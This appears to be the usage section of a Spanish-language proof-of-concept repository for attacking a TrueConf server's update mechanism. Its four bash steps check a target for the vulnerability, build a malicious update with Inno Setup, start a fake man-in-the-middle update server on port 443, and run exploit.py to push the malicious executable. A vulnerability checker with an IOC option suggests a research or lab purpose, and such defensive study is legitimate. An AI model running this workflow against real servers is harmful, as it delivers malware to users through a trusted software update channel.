1. Verificar Vulnerabilidad
bash
python detectors/vulnerability_checker.py https://trueconf.local
python detectors/vulnerability_checker.py https://trueconf.local --check-iocs
2. Construir Actualización Maliciosa
bash
python malicious_update_builder.py
# Sigue las instrucciones para compilar con Inno Setup
3. Iniciar Servidor Falso (MITM)
bash
python update_server.py --update malicious_update.exe --port 443
4. Simular Ataque
bash
python exploit.py https://trueconf.local --payload malicious_update.exe
